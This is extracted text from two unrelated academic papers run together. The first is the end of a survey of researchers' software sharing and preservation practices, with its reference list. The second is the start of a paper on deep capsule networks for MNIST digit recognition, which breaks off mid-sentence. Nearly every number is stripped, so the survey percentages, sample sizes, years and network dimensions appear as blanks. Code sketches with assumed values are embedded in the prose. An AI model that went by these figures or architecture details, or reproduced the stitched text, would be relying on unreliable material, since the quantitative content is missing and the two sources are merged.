figure . methods and formats for sharing software (panels: (a) how do you tell people about the code or software you’ve shared? options: directly via e-mail, in a scholarly publication, through posts on my website/lab website, through social media, in a software or data paper, through online communities, other; (b) in what format do you typically share your code? options: source code, executable code, both). note that both of these questions could be answered with more than one response. sharing format and platform we asked our participants about how they share their code and found that . % of participants share their software in the form of source code, . % share executables only, and . % share both formats (figure ). as shown in figure (a), participants indicated that they share their software through a variety of channels, with the most common being e-mail. the figure shows that . % of the time our participants make their code available through direct communication and % make their code available through social media platforms. the participants who indicated that they use methods other than those listed in our survey generally responded that they do so using platforms such as github or the open science framework. a few researchers mentioned that they save their code along with the dataset in their institutional repository, while others indicated that they publicize their code via conferences. . preserving research software we asked a variety of questions about preserving research software (i.e. do you take any steps to ensure that your code or software is preserved over the long term?, how long do you typically save your code or software?, and where do you save your code or software so that it is preserved over the long term?). while research software is a building block for ensuring reproducibility, . % of participants (n = ) do not prepare their code for long-term preservation. how long do you typically save your code or software? figure (a) shows that the majority of our participants ( . % out of ) preserve their code for more than eight years, but generally not in a way that maintains its use. in contrast, . % (n = ) of participants keep their code until it is described in a publication, poster, or presentation. we found that . % out of researchers tend to keep their code years or less and . % tend to keep their code - year. only . % out of researchers tend to keep their code for years or more while maintaining it for future access and use. where do you save your code or software so that it is preserved over the long term? in terms of where our participants preserve their code, figure (b) shows that . % of the time participants use code hosting sites such as github. about . % of the time, researchers use hard drives or external storage to preserve their code, and . % of the time they preserve their code by putting it on the cloud. only . % of our participants indicated that they use archival repositories (e.g. figshare). the participants who entered “other” responses mentioned that they use a backup system of their lab, an organization archive (e.g., a university server), their own pc, a language package registry (cran, pypi or similar), an internal svn repository, or project-specific websites.
figure . . % of researchers use github for preserving their code (panels: (a) how long do you typically save your code or software? options: more than years without maintaining, more than years and maintained, - years, - years, until it is described in a publication; (b) where do you save your code or software so that it is preserved over the long term? options: on a code hosting site, on a hard drive/external storage, in the cloud, on my website, in an archival repository, in a discipline specific index or registry, other). note that the second question could be answered with more than one choice. we asked participants to define sharing and preserving in their own words. their responses generally indicated that they make a distinction between the two concepts. for example, one participant stated succinctly, “sharing is making code available to others, in a readily usable form. preserving is ensuring to the extent practical that the code will be usable as far into the future as possible.” however, several responses indicated that participants did not necessarily regard preservation as an active process that continues even after the conclusion of a particular project (e.g. “sharing means giving access to my code to someone else. preserving means placing my code somewhere where it can remain and i will not delete it to save room or lose it when i switch computers or suffer a hard drive failure.”). in contrast, other responses indicated that participants were aware that preservation is important for reuse purposes and had knowledge of preservation tools. for example, one researcher defined preserving software as “branching so that code remains compatible with different versions of overarching libraries (in my case) or with new coding standards and compilers”, and another stated “preserving should be done via a system like lockss that provides for redundancy. sharing can be done via the web, but must include a license so that recipients know about their rights.” discussion scholars throughout the humanities and sciences depend on software for a wide variety of purposes, including the collection, analysis, and visualization of data (borgman et al. ( ); hey et al. ( )). though ubiquitous, software presents significant challenges to efforts aimed at ensuring reproducibility. our results demonstrate that researchers not only create and use software in a wide variety of forms and for a wide variety of purposes, but also that their software-related practices are often not completely in line with those associated with reproducibility. in particular, our results demonstrate that, while scholars often save their software for long periods of time, many do not actively preserve or maintain it. this perspective is perhaps best encapsulated by one of our participants who, when completing our open response question about the definition of sharing and preserving software, wrote “sharing means making it publicly available on github. preserving means leaving it on github”. we share this anecdote not to criticize our participants or their practices, but to illustrate the outstanding need for support services related to software. in the broader scholarly communications space, there are several prominent frameworks that relate to the reproducibility of scholarly outputs. as part of an effort to advance data as a “first class” research product, the fair (findable, accessible, interoperable, and reusable) guidelines provide a measurable set of principles related to the management and sharing of research data (wilkinson et al. ( )). the fair principles are general enough that they can, with some modification, also be applied to software (jimenez et al. ( )).
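the percentages for multi-select questions reported in this section (for example, where participants preserve their code) come from tallying answers where one respondent can pick several options. the snippet below is a minimal sketch of such a tally; the file name, the column name, and the assumption that multi-select answers are stored as semicolon-separated strings are all illustrative and do not describe the actual layout of the released data set.

```python
# sketch of summarizing one multi-select survey question as percentages.
# column name, option encoding, and file name are hypothetical.
import pandas as pd

responses = pd.read_csv("survey_responses.csv")  # hypothetical file name

# assume the multi-select answers are stored as semicolon-separated strings
options = (
    responses["preservation_location"]
    .dropna()
    .str.split(";")
    .explode()
    .str.strip()
)

# share of all selections accounted for by each option
summary = options.value_counts(normalize=True).mul(100).round(1)
print(summary)
```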
at the level of scholarly publications, the top (transparency and openness promotion) guidelines (nosek et al. ( )) address citation standards and the availability of research materials including data and software. a supplement to top, the reproducibility enhancement principles (rep) (stodden et al. ( )) specifically target disclosure issues related to computation and software. however, our results support previous work indicating that software still mostly exists outside the reputation economy of science (howison and herbsleb ( )), which suggests that a more education-based approach, one that provides guidance about software before the publication stage, is necessary. the majority of our participants indicated that they view code or software as a “first class” research product that should be assessed, valued, and shared in the same way as a journal article. however, our results also indicate that there remains a significant gap between this perception and actual practice. the fact that our participants indicated that they create and use software in a wide variety of forms and for a wide variety of purposes demonstrates the significant technical challenges inherent in ensuring computational reproducibility. in contrast, the lack of active preservation and the tendency to share software outside traditional (and measurable) scholarly communications channels displayed by our sample demonstrate the social and behavioral challenges. a significant difficulty in ensuring computational reproducibility is that researchers oftentimes do not treat their software as a “first class” research product. these findings reinforce the need for programs to train researchers on how to maintain their code in the active phase of their research. at present, there are a number of initiatives focused on addressing the preservation and reproducibility of software. in the united states, the software preservation network (spn) (meyerson et al. ( )) represents an effort to coordinate work to ensure long-term access to software. the focus of spn is generally on cultural heritage software rather than research software, but their work delineating issues related to metadata, governance, and technical infrastructure has substantial overlap with what is required for research software. in the united kingdom, the software sustainability institute trains researchers on how to develop better software and make better use of the supporting infrastructure (crouch et al. ( )). befitting the necessity of training and preservation indicated by our study, a similar effort, the us software sustainability initiative, was recently awarded funding by the national science foundation (nsf award # ). while it is likely not possible for academic institutions to offer support services that cover the broad range of programming languages and applications described in our survey results, collaborating with such groups to create guidance and best practice recommendations may be a feasible first step in engaging with researchers about their software and code in the same manner as many research data management (rdm) initiatives now engage with them about their data. while research stakeholders including academic institutions, publishers, and funders have an interest in tackling issues of computational reproducibility in order to ensure the integrity of the research process, our results demonstrate the complexity of doing so.
one participant summed up why their code could not be made re-usable: “most of my coding is project specific and not reusable between projects because the datasets i encounter are very variable. i typically only generate packages for tasks such as getting data from a database (e.g., pubmed) and keeping rmarkdown templates in an orderly way.” conclusion and future work in this paper, we introduced the results of surveying researchers across different institution on software usage, sharing, and preservation. we also checked the practices used to manage software for ensuring the reproducibility and integrity of the scientific research. our results point to several interesting trends including the widespread writing of source code and use of source code written by others, the variety of programming languages used and the lack of consistency even within the same lab or research group, the use of open source software over commercial software, and the adoption of some practices assure computational reproducibility, such as adding comments and documentation to code, but not others, specifically the general lack of active preservation. the findings of this paper inform ongoing conversations about research software and reproducibility on the current practices around research software. this will help service providers to deliver the right tools and systems that help researchers to manage their code and help in ensuring the integrity of the reproducibility in the scholarly ecosystem. the present study was designed to capture a broad picture of how researchers use and share their software. for this reason, we were not able to provide a particularly granular picture of how individual practices relate to reproducible science outcomes. for example, while the majority of our participants / responded that they include comments in their source code and generate documentation for their software, we were not able to make any judgment about whether or not the contents of these comments and documentation are sufficient to ensure reproducibility. follow up research is needed in order to gain a more nuanced understanding of how processes related to the creation and use of research software relate to reproducibility. however, despite these limitations, our results indicate several potential directions for future library services centered on helping researchers create, use, and share their software and assure computational reproducibility. acknowledgments we would like to thank our colleagues at uc berkeley library and california digital library for their valuable suggestions and insightful comments throughout this project. references alnoamany, y. and borghi, j. a. ( a). data: researcher perspectives on the use and sharing of software. alnoamany, y. and borghi, j. a. ( b). software study code. barnes, n. ( ). publish your computer code: it is good enough. nature, ( ): – . boettiger, c. ( ). an introduction to docker for reproducible research. acm sigops operating systems review, ( ): – . borgman, c. l., wallis, j. c., and mayernik, m. s. ( ). who’s got the data? interdependencies in science and technology collaborations. computer supported cooperative work (cscw), ( ): – . chirigati, f., shasha, d., and freire, j. ( ). reprozip: using provenance to support computational reproducibility. in proceedings of the th usenix workshop on the theory and practice of provenance, tapp ’ , pages – . usenix association. crouch, s., hong, n. c., hettrick, s., jackson, m., pawlik, a., sufi, s., carr, l., roure, d. 
d., goble, c., and parsons, m. ( ). the software sustainability institute: changing research software attitudes and practices. computing in science & engineering, ( ): – . eglen, s. j., marwick, b., halchenko, y. o., hanke, m., sufi, s., gleeson, p., silver, r. a., davison, a. p., lanyon, l., abrams, m., wachtler, t., willshaw, d. j., pouzat, c., and poline, j.-b. ( ). toward standard practices for sharing computer code and programs in neuroscience. nature neuroscience, : . fecher, b., friesike, s., and hebing, m. ( ). what drives academic data sharing? plos one, ( ): – . goble, c. ( ). better software, better research. ieee internet computing, ( ): – . goodman, s. n., fanelli, d., and ioannidis, j. p. a. ( ). what does research reproducibility mean? science translational medicine, ( ): ps – ps . hafer, l. and kirkpatrick, a. e. ( ). assessing open source software as a scholarly contribution. communications of the acm, ( ): – . hannay, j. e., macleod, c., singer, j., langtangen, h. p., pfahl, d., and wilson, g. ( ). how do scientists develop and use scientific software? in proceedings of the icse workshop on software engineering for computational science and engineering, secse ’ , pages – . ieee computer society. hey, t., tansley, s., and tolle, k. ( ). the fourth paradigm: data-intensive scientific discovery. microsoft research. hong, n. c. ( ). digital preservation and curation: the danger of overlooking software. the preservation of complex objects, page . hong, n. c. ( ). dealing with software: the research data issues. howison, j. and bullard, j. ( a). how is software visible in the scientific literature. technical report, technical report, univ. of texas. howison, j. and bullard, j. ( b). software in the scientific literature: problems with seeing, finding, and using software mentioned in the biology literature. journal of the association for information science and technology. howison, j. and herbsleb, j. d. ( ). scientific software production: incentives and collaboration. / in proceedings of the acm conference on computer supported cooperative work, cscw ’ , pages – . acm. howison, j. and herbsleb, j. d. ( ). incentives and integration in scientific software production. in proceedings of the acm conference on computer supported cooperative work, cscw ’ , pages – . acm. hucka, m. and graham, m. j. ( ). software search is not a science, even among scientists. corr, abs/ . . inc., s. e. ( ). developer survey results . ince, d. c., hatton, l., and graham-cumming, j. ( ). the case for open computer programs. nature, : . jimenez, r., kuzak, m., alhamdoosh, m., barker, m., batut, b., borg, m., capella-gutierrez, s., chue hong, n., cook, m., corpas, m., flannery, m., garcia, l., gelpì, j., gladman, s., goble, c., gonz·lez ferreiro, m., gonzalez-beltran, a., griffin, p., gr¸ning, b., hagberg, j., holub, p., hooft, r., ison, j., katz, d., leskoek, b., lupez gumez, f., oliveira, l., mellor, d., mosbergen, r., mulder, n., perez-riverol, y., pergl, r., pichler, h., pope, b., sanz, f., schneider, m., stodden, v., suchecki, r., svobodov· va?ekov·, r., talvik, h., todorov, i., treloar, a., tyagi, s., van gompel, m., vaughan, d., via, a., wang, x., watson-haigh, n., and crouch, s. ( ). four simple recommendations to encourage best practices in research software [version ; referees: approved]. f research, ( ). joppa, l. n., mcinerny, g., harper, r., salido, l., takeda, k., o’hara, k., gavaghan, d., and emmott, s. ( ). troubling trends in scientific software use. science, ( ): – . katz, d. 
s., allen, g., hong, n. c., parashar, m., and proctor, d. ( ). first workshop on sustainable software for science: practice and experiences (wssspe): submission and peer-review process, and results. arxiv preprint arxiv: . . kim, y. and stanton, j. m. ( ). institutional and individual factors affecting scientists’ data-sharing behaviors: a multilevel analysis. journal of the association for information science and technology, ( ): – . kissel, r., kissel, r., blank, r., and secretary, a. ( ). glossary of key information security terms. in nist interagency reports nist ir revision , national institute of standards and technology. kluyver, t., ragan-kelley, b., pérez, f., granger, b., bussonnier, m., frederic, j., kelley, k., hamrick, j., grout, j., corlay, s., ivanov, p., avila, d., abdalla, s., willing, c., and development team [unknown], j. ( ). jupyter notebooks: a publishing format for reproducible computational workflows. in loizides, f. and scmidt, b., editors, positioning and power in academic publishing: players, agents and agendas, pages – . ios press. kratz, j. e. and strasser, c. ( ). researcher perspectives on publication and peer review of data. plos one, ( ): – . marwick, b. ( ). computational reproducibility in archaeological research: basic principles and a case study of their implementation. journal of archaeological method and theory, ( ): – . mccarthy, d. j., humburg, p., kanapin, a., rivas, m. a., gaulton, k., cazier, j.-b., and donnelly, p. ( ). choice of transcripts and software has a large effect on variant annotation. genome medicine, ( ): . meyerson, j., vowell, z., hagenmaier, w., leventhal, a., roke, e. r., rios, f., and walsh, t. ( ). the software preservation network (spn): a community effort to ensure long term access to digital cultural heritage. d-lib magazine, ( / ). monteith, j. y., mcgregor, j. d., and ingram, j. e. ( ). scientific research software ecosystems. in proceedings of the european conference on software architecture workshops, ecsaw ’ , pages : – : . acm. morin, a., urban, j., adams, p. d., foster, i., sali, a., baker, d., and sliz, p. ( a). shining light into black boxes. science, ( ): – . morin, a., urban, j., and sliz, p. ( b). a quick guide to software licensing for the scientist-programmer. plos computational biology, ( ): – . munafò, m. r., nosek, b. a., bishop, d. v. m., button, k. s., chambers, c. d., percie du sert, n., simonsohn, u., wagenmakers, e.-j., ware, j. j., and ioannidis, j. p. a. ( ). a manifesto for reproducible science. nature human behaviour, ( ): . nih ( ). strategies for nih data management, sharing, and citation. / nosek, b. a., alter, g., banks, g. c., borsboom, d., bowman, s. d., breckler, s. j., buck, s., chambers, c. d., chin, g., christensen, g., contestabile, m., dafoe, a., eich, e., freese, j., glennerster, r., goroff, d., green, d. p., hesse, b., humphreys, m., ishiyama, j., karlan, d., kraut, a., lupia, a., mabry, p., madon, t., malhotra, n., mayo-wilson, e., mcnutt, m., miguel, e., paluck, e. l., simonsohn, u., soderberg, c., spellman, b. a., turitto, j., vandenbos, g., vazire, s., wagenmakers, e. j., wilson, r., and yarkoni, t. ( ). promoting an open research culture. science, ( ): – . nosek, b. a., spies, j. r., and motyl, m. ( ). scientific utopia: ii. restructuring incentives and practices to promote truth over publishability. perspectives on psychological science, ( ): – . pan, x., yan, e., and hua, w. ( ). disciplinary differences of software use and impact in scientific literature. 
scientometrics, ( ): – . perez, f. and granger, b. e. ( ). ipython: a system for interactive scientific computing. computing in science engineering, ( ): – . piccolo, s. r. and frampton, m. b. ( ). tools and techniques for computational reproducibility. gigascience, ( ): . prabhu, p., jablin, t. b., raman, a., zhang, y., huang, j., kim, h., johnson, n. p., liu, f., ghosh, s., beard, s., oh, t., zoufaly, m., walker, d., and august, d. i. ( ). a survey of the practice of computational science. in state of the practice reports, sc ’ , pages : – : . acm. prlić, a. and procter, j. b. ( ). ten simple rules for the open development of scientific software. plos comput biol, ( ):e . ram, k., katz, d., carver, j., gesing, s., and weber, n. ( ). si -s i conceptualization: conceptual- izing a us research software sustainability institute (urssi). rios, f. ( ). the pathways of research software preservation: an educational and planning resource for service development. d-lib magazine, ( / ). sadowski, c., stolee, k. t., and elbaum, s. ( ). how developers search for code: a case study. in proceedings of the th joint meeting on foundations of software engineering, pages – . acm. sandve, g. k., nekrutenko, a., taylor, j., and hovig, e. ( ). ten simple rules for reproducible computational research. plos computational biology, ( ): – . smith, a. m., katz, d. s., and niemeyer, k. e. a. ( ). software citation principles. peerj computer science, :e . stodden, v. ( ). the legal framework for reproducible scientific research: licensing and copyright. computing in science & engineering, ( ): – . stodden, v., guo, p., and ma, z. ( ). toward reproducible computational research: an empirical analysis of data and code policy adoption by journals. plos one, ( ): – . stodden, v., leisch, f., and peng, r. d. ( ). implementing reproducible research. crc press. stodden, v., mcnutt, m., bailey, d. h., deelman, e., gil, y., hanson, b., heroux, m. a., ioannidis, j. p., and taufer, m. ( ). enhancing reproducibility for computational methods. science, ( ): – . teal, t. k., cranston, k. a., lapp, h., white, e., wilson, g., ram, k., and pawlik, a. ( ). data carpentry: workshops to increase data literacy for researchers. international journal of digital curation, ( ): – . tenopir, c., allard, s., douglass, k., aydinoglu, a. u., wu, l., read, e., manoff, m., and frame, m. ( ). data sharing by scientists: practices and perceptions. plos one, ( ):e . tenopir, c., dalton, e. d., allard, s., frame, m., pjesivac, i., birch, b., pollock, d., and dorsett, k. ( ). changes in data sharing and data reuse practices and perceptions among scientists worldwide. plos one, ( ): – . thain, d., ivie, p., and meng, h. ( ). techniques for preserving scientific software executions: preserve the mess or encourage cleanliness? proceedings of the th international conference on digital preservation (ipres). vandewalle, p. ( ). code sharing is associated with research impact in image processing. computing in science engineering, ( ): – . wellcome ( ). policy on data, software and materials management and sharing. wilkinson, m. d., dumontier, m., aalbersberg, i. j., appleton, g., axton, m., baak, a., blomberg, n., boiten, j.-w., da silva santos, l. b., bourne, p. e., bouwman, j., brookes, a. j., clark, t., crosas, / m., dillo, i., dumon, o., edmunds, s., evelo, c. t., finkers, r., gonzalez-beltran, a., gray, a. j. g., groth, p., goble, c., grethe, j. s., heringa, j., ’t hoen, p. a. c., hooft, r., kuhn, t., kok, r., kok, j., lusher, s. j., martone, m. 
e., mons, a., packer, a. l., persson, b., rocca-serra, p., roos, m., van schaik, r., sansone, s.-a., schultes, e., sengstag, t., slater, t., strawn, g., swertz, m. a., thompson, m., van der lei, j., van mulligen, e., velterop, j., waagmeester, a., wittenburg, p., wolstencroft, k., zhao, j., and mons, b. ( ). the fair guiding principles for scientific data management and stewardship. scientific data, : . wilson, g. ( ). software carpentry: getting scientists to write better code by making them more productive. computing in science & engineering, ( ): – . wilson, g., bryan, j., cranston, k., kitzes, j., nederbragt, l., and teal, t. k. ( ). good enough practices in scientific computing. plos computational biology, ( ): – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - deep capsule network handwritten digit recognition yuxing tan school of computer science and engineering xi'an technological university xi'an, china e-mail: yuxing_tan@foxmail.com hongge yao school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—aiming at the weakness of cnn of not being sensitive to changes in relative position and angle, a method of handwritten digit recognition based on a deep capsule network is studied. the capsule network represents multiple attributes of an entity through a group of capsules composed of neurons, which effectively preserves information about the position and posture of the entity. the dynamic routing algorithm makes the information interaction between capsules clearer and can determine the pose of the entity more accurately. while addressing the shortcomings of convolutional neural networks, it also integrates the advantages of cnn and takes into account the relative position information that cnn lacks, so that the recognition effect is improved. the design implements a deep capsule network: it reduces the amount of trainable parameters by changing the size of the convolution kernel, expands the original network structure by adding a convolution after the convolution layer, adds a process of dynamic routing on top of the main dynamic routing, and changes the number of iterations for experimentation, which makes the recognition accuracy of the network higher on the mnist data set. keywords—deep learning; nerve capsule; deep capsule network; handwritten digit recognition i. introduction in our daily life, handwritten numbers are very common, but in many areas of work the part that involves numbers, such as data collection, is sometimes very cumbersome and time-consuming. this is where handwriting recognition technology comes in, bringing convenience and efficiency to humans. the proposal of the nerve capsule comes from an assumption of hinton[ ]: instead of using a group of coarse coding or single neurons to represent the relationship between the observer and the object, such as the object's posture information, a set of activated neurons is selected to represent it. this group of neurons is called a nerve capsule. one of the advantages of the capsule network is that it needs less training data than a convolutional neural network, while the effect is not inferior to it. for the traditional neural network, neurons cannot represent multiple attributes at the same time, with the result that the activation of a neuron can only represent a certain entity.
in this way, the nature of the entity will be hidden in a large number of network parameters. when adjusting the network parameters, we cannot guarantee that an adjustment serves a single purpose: it must take into account all kinds of input samples, so tuning the parameters is inevitably troublesome and time-consuming. after vector neurons are applied, the existence of all the properties wrapped in a capsule can be determined; when adjusting parameters, such constraints are greatly reduced and good parameters are easier to obtain. the design and research of artificial neural networks largely borrows from the structure of biological neural networks. in neuroscience, a conclusion has been drawn that there are a large number of cortical dominant structures in the cerebral cortex of most primates. there are hundreds of neurons in these structures, and there are also hierarchical structures within them. these small units can handle different types of visual stimuli well. researchers speculate that there is a mechanism in the brain that combines low-level visual features with some weight values to construct the colorful world in our eyes. based on this discovery in biology, hinton suggests that it is more appropriate to try to represent the relationship between the object and the observer with a series of active neurons instead of one. hence the nerve capsule mentioned earlier. in october , sabour, hinton and others published the paper "dynamic routing between capsules"[ ] at nips, a top-level conference on machine learning, and proposed the capsule network (capsnet). this is a deep learning method that shook the whole field of artificial intelligence: it breaks a bottleneck of the convolutional neural network (cnn) and pushes the field to a new level. this paper focuses on the recognition of the mnist data set based on the capsule network. mnist[ ] is a data set composed of digits handwritten by different people. although bp neural networks[ ] and convolutional neural networks[ ][ ][ ][ ] achieve reasonably good recognition of handwritten digits, the emergence of the capsule network brings a new breakthrough to the recognition of such data sets, with a better recognition effect, and its recognition accuracy greatly exceeds that of the convolutional neural network. ii. related work the neural capsule proposed by hinton implements ontology from the perspective of philosophy. the various properties of a particular entity are represented by the activity of nerve cells in an activated capsule. these attributes include the size, location, orientation and other information of the entity. from the existence of some special attributes, we can infer the existence of instances. in the field of machine learning, the probability of entity existence is usually represented by the output of an independent logistic regression unit. in the neural capsule, the norm obtained by normalizing the output high-order vector represents the existence probability of the entity, and the attributes of the entity are represented by the various "postures" of the vector. this reflects the essence of ontology, that is, to define the existence of an entity according to its various attributes. in research on capsule networks, the working process of the capsule network is closer to the behavior of the human brain, partly because it needs less training data.
in the aspect of white-box adversarial attacks, the capsule network shows strong resistance. under the fast gradient sign method, its accuracy can still be maintained above %. the accuracy of training and testing on mnist is better than that of a convolutional neural network. in some practical applications, such as specific text classification tasks, a convolutional capsule network can effectively improve the accuracy of feature extraction [ ]. chinese scholars have also applied a visual reconstruction method based on the capsule network structure in the field of functional magnetic resonance imaging. in intelligent traffic sign recognition, by introducing a pooling layer into the main capsule layer, a very deep convolution model improves the feature extraction part of the original network structure and uses a moving exponential average method to improve the dynamic routing algorithm, which improves the recognition accuracy of the network in the field of traffic sign recognition. the capsule network first appeared in the article "dynamic routing between capsules" published by hinton et al. in october . based on the capsule network proposed by sabour et al. in , an improved version of the capsule system was proposed in the article "matrix capsules with em routing"[ ] published in . in this system, each capsule uses a logistic unit to represent the presence or absence of an entity, and a × pose matrix is used to represent the pose information of the entity. that paper describes an iterative routing method between capsule layers based on the em algorithm: the output of the lower-layer capsules reaches the higher-level capsules through the routing algorithm, so that an activated capsule receives a group of similar pose votes. the new system is much more resistant to white-box adversarial attacks than a baseline cnn. in the paper "stacked capsule autoencoders"[ ] published in , an unsupervised capsule autoencoder (scae) is introduced. by observing the neural encoders of all components, the existence and pose information of the target can be inferred, that is to say, the object can be inferred explicitly through the relationship between its components. the accuracy on the svhn[ ] and mnist datasets is % and . %, respectively. iii. deep capsule network a. structure of deep capsule network ) encoder structure of deep capsule network figure . network structure of the deep capsule network. conv : standard convolution. it is dedicated to extracting some low-level feature information from the input image. this preprocessing layer of capsnet converts the brightness of pixels in the input layer into local feature outputs. the input image of this layer is × , with convolution kernels with step size of and size of × . after convolution, the output is a three-dimensional array. by reshaping the array, an appropriate feature vector of position information is constructed for each dimension. the final output is a tensor of × × . conv : standard convolution layer, including convolution kernels with step size of and size of × ; it takes an input tensor of × × and outputs a tensor of × × . primary capsule: the primary capsule layer is in a low-level stage; multidimensional entities are described in capsnet from the perspective of "inverse graphics". it is a reverse rendering process, that is, this layer can combine the low-level features detected by the previous layer.
this layer is still committed to extracting feature information, so it still belongs to the convolution layers; the object of convolution, however, is changed from single neurons to capsules with larger granularity, which is what distinguishes it from an ordinary convolutional network. the primary capsule layer is the "capsule version" of a convolution layer, and this stage is where the capsules really begin. this layer consists of main capsules, each of which contains convolution kernels of × × with step size of . according to the above, a tensor of × × × is obtained by inputting × × tensors into this layer. digitcaps: digital capsule layer, which is also the fully connected layer of the capsule network. using a fully connected topology, the capsules in this layer connect to all outputs of the previous primary capsule layer. because this paper finally realizes the recognition of the digits - , there are capsules in this layer. the norm of each activation vector represents the probability of each classification and is used to calculate the classification loss. the input received by this layer is the × × × tensor output by the previous layer, and the output is a matrix of × . finally, the capsule network is compared with the improved deep capsule network as shown in the following table: ) decoder structure the decoder structure in this paper is the same as in capsnet, as shown in the figure. the goal of capsnet model optimization is to calculate the edge (margin) loss for each digit, to allow multiple digits to exist at the same time. in addition, capsnet can reconstruct the input image based on the instantiation parameters obtained by the previous processing. in the training process of image reconstruction, only the activated capsules are allowed to participate in the adjustment of the three-level fully connected network each time. the structure mainly responsible for reconstructing the image is the decoder, which receives a × matrix from the digital capsule layer and reconstructs a × image after three fully connected layers. table i. structure comparison of capsule network and deep capsule network. convolution layer — capsule network: conv : * ; deep capsule network: conv : * , conv : * . primary capsule — capsule network: * ; deep capsule network: * . digit capsule — both networks. dynamic routing — capsule network: one time, three iterations; deep capsule network: twice, where the main route has three iterations and the secondary route has three iterations. fc — both networks. figure . decoder network.
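as a concrete illustration of the layer stack just described (two standard convolutions, a primary capsule layer, a digit capsule layer, and a three-layer fully connected decoder), the following is a minimal pytorch sketch. the exact kernel sizes, channel counts and capsule dimensions are elided in the text above, so the concrete numbers used here (5×5 kernels for the two convolutions, 32 primary-capsule maps of 8-dimensional vectors, 10 digit capsules of 16 dimensions, a 512-1024-784 decoder) are assumptions borrowed from the original capsnet of sabour et al., not the authors' exact configuration.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F


def squash(s, dim=-1, eps=1e-8):
    # shrink the norm of s into [0, 1) while keeping its direction
    sq = (s ** 2).sum(dim=dim, keepdim=True)
    return (sq / (1.0 + sq)) * s / torch.sqrt(sq + eps)


class DeepCapsEncoder(nn.Module):
    """conv1 -> conv2 -> primary capsules -> prediction vectors u_hat."""

    def __init__(self, num_classes=10, prim_maps=32, prim_dim=8, digit_dim=16):
        super().__init__()
        self.conv1 = nn.Conv2d(1, 256, kernel_size=5, stride=1)
        self.conv2 = nn.Conv2d(256, 256, kernel_size=5, stride=1)
        self.primary = nn.Conv2d(256, prim_maps * prim_dim, kernel_size=9, stride=2)
        self.prim_maps, self.prim_dim = prim_maps, prim_dim
        n_prim = prim_maps * 6 * 6  # 1152 for a 28x28 mnist input with the sizes above
        # transformation matrices W_ij mapping 8-d primary capsules to 16-d digit capsules
        self.W = nn.Parameter(0.01 * torch.randn(1, n_prim, num_classes, digit_dim, prim_dim))

    def forward(self, x):                                        # x: (batch, 1, 28, 28)
        x = F.relu(self.conv1(x))
        x = F.relu(self.conv2(x))
        u = self.primary(x)                                      # (batch, 256, 6, 6)
        b = u.size(0)
        u = u.view(b, self.prim_maps, self.prim_dim, 6, 6)
        u = u.permute(0, 1, 3, 4, 2).reshape(b, -1, self.prim_dim)  # (batch, 1152, 8)
        u = squash(u)                                            # primary capsule outputs
        # prediction vectors u_hat_{j|i} = W_ij u_i for every (lower i, upper j) pair
        u = u[:, :, None, :, None]                               # (batch, 1152, 1, 8, 1)
        u_hat = (self.W @ u).squeeze(-1)                         # (batch, 1152, 10, 16)
        return u_hat


class Decoder(nn.Module):
    """three fully connected layers reconstructing the 28x28 input image."""

    def __init__(self, num_classes=10, digit_dim=16):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(num_classes * digit_dim, 512), nn.ReLU(),
            nn.Linear(512, 1024), nn.ReLU(),
            nn.Linear(1024, 28 * 28), nn.Sigmoid(),
        )

    def forward(self, digit_caps):                               # (batch, 10, 16)
        return self.net(digit_caps.flatten(1)).view(-1, 1, 28, 28)
```

the routing procedure that turns these prediction vectors into digit-capsule outputs, and the margin loss used to train them, are sketched after the loss-function discussion below.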
b. working mechanism of dynamic routing in this paper there are two routes, the primary route and the secondary route, but both have the same dynamic routing structure. routing is used to ensure that the output of a capsule is only delivered to the appropriate parent node, which is similar to the idea of "focusing on cultivation". a lower-layer capsule i needs to know how to deliver its output vector to a higher-level capsule j, and for this it is necessary to evaluate the coupling degree between the low-level capsules and the high-level capsules. this coupling is represented by the scalar weight $c_{ij}$, which expresses its importance. in this high-dimensional vector space, in order to describe the spatial relationship of different parts of the entity, each capsule is given a corresponding weight, and an affine transformation matrix composed of several weight vectors is generated. after this transformation we obtain, for each possible higher-level capsule j, the prediction vector of low-level capsule i, $\hat{u}_{j|i} = W_{ij} u_i$, obtained by multiplying the weight matrix $W_{ij}$ with the output $u_i$ of the low-level capsule. the prediction vector provides instance parameters for the high-level capsule, and the higher-level capsule will be activated when the information provided by multiple prediction results is consistent. the low-level neural capsule i is connected with any high-level capsule j which has a "coupling" relationship with it. by multiplying the corresponding coupling coefficient $c_{ij}$ with the prediction vector $\hat{u}_{j|i}$ of each low-level capsule i for the high-level capsule j and then performing a weighted sum, the output $s_j$ can be obtained. the output of the capsule in the next round is a high-dimensional vector $v_j$, which is obtained by applying the squash extrusion function to $s_j$. the calculation formula is as follows: $$ s_j = \sum_i c_{ij}\, \hat{u}_{j|i} $$ for an intermediate-layer capsule, the input is a vector and the output is also a vector, but the input process has two stages: ) linear combination: unlike a linear combination of neurons, the connection weights between capsules are represented by a matrix instead of a scalar value, in the form of a vector. ) dynamic routing: the core work of this stage is to determine the closeness of the relationship between high-level capsule j and low-level capsule i, that is, to find the most suitable coupling coefficient value $c_{ij}$, which is determined in the repeated process of the dynamic routing algorithm. c. dynamic routing algorithm the process of the dynamic routing algorithm is as follows: a. softmax processes the data, b. predict the output, c. weighted sum, d. compress the vector, e. update the coupling coefficients. the following figure is a description of the dynamic routing algorithm. figure . dynamic routing algorithm. ) the three input parameters are $\hat{u}_{j|i}$ (the prediction vector from i to j), r (the number of iterations of the routing algorithm) and l (the number of the capsule layer). ) for all capsules of layer l and layer (l + ), the prior probability coefficient $b_{ij}$ of the two adjacent layers is initialized to , and its value will be used in the iterative update process; after the iterations, the value is stored in the corresponding $c_{ij}$. ) iterate r times. ) the softmax rule is used to calculate the $c_{ij}$ between the lower and higher layers. in the beginning, because all $b_{ij}$ are initialized to zero, the obtained $c_{ij}$ are also equal; that is to say, at this point every node in the lower layer is equally important for the high-level capsules, and the parent nodes at the higher level receive information from all the lower-level capsules. this confusion in the initial stage of the algorithm gradually becomes clearer in the later iterative calculations. ) the weighted sum of the high-level capsules is calculated; the weights of the combination are the $c_{ij}$ obtained in the previous step. ) $s_j$ is a vector with a magnitude and a direction. however, if its length is to be used as the probability of the existence of the entity, its magnitude needs to be normalized, and a nonlinear extrusion (squash) function is used to complete this normalization. this function retains the vector direction while compressing the module length of the vector, so the result is the output $v_j$ of the high-level capsule. ) the coupling between capsules is dynamic: the larger the dot product $\hat{u}_{j|i} \cdot v_j$, that is, the more 